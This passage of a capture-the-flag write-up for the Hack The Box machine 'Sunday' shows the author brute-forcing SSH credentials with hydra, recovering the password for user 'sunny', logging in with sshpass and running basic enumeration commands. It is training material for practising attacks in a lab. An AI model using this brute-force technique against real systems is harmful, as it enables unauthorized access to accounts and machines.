SSH
┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ hydra -l users -p wordlist ssh://sunday:22022 -t 4
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-01-21 15:58:26
[data] max 4 tasks per 1 server, overall 4 tasks, 8 login tries (l:2/p:4), ~2 tries per task
[data] attacking ssh://sunday:22022/
[22022][ssh] host: sunday login: sunny password: sunday
1 of 1 target successfully completed, 1 valid password found
hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-01-21 15:58:32I got 2 valid system users and decided to check for weak credentials
As to my surprise, hydra found a password for the sunny user.
The found password is sunday
┌──(kali㉿kali)-[~/archive/htb/labs/sunday]
└─$ sshpass -p sunday ssh sunny@$IP -p 22022 5 ⨯
last login: Sat Jan 21 14:49:49 2023
Oracle Corporation SunOS 5.11 11.4 Aug 2018
sunny@sunday:~$ whoami
sunny
sunny@sunday:~$ hostname
sunday
sunny@sunday:~$ ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index 1
inet 127.0.0.1 netmask ff000000
net0: flags=100001000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4,PHYSRUNNING> mtu 1500 index 2
inet 10.10.10.76 netmask fffffe00 broadcast 10.10.11.255
lo0: flags=2002000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv6,VIRTUAL> mtu 8252 index 1
inet6 ::1/128
net0: flags=120002000840<RUNNING,MULTICAST,IPv6,PHYSRUNNING> mtu 1500 index 2
inet6 ::/0 Initial Foothold established to the target system as the sunny user via SSH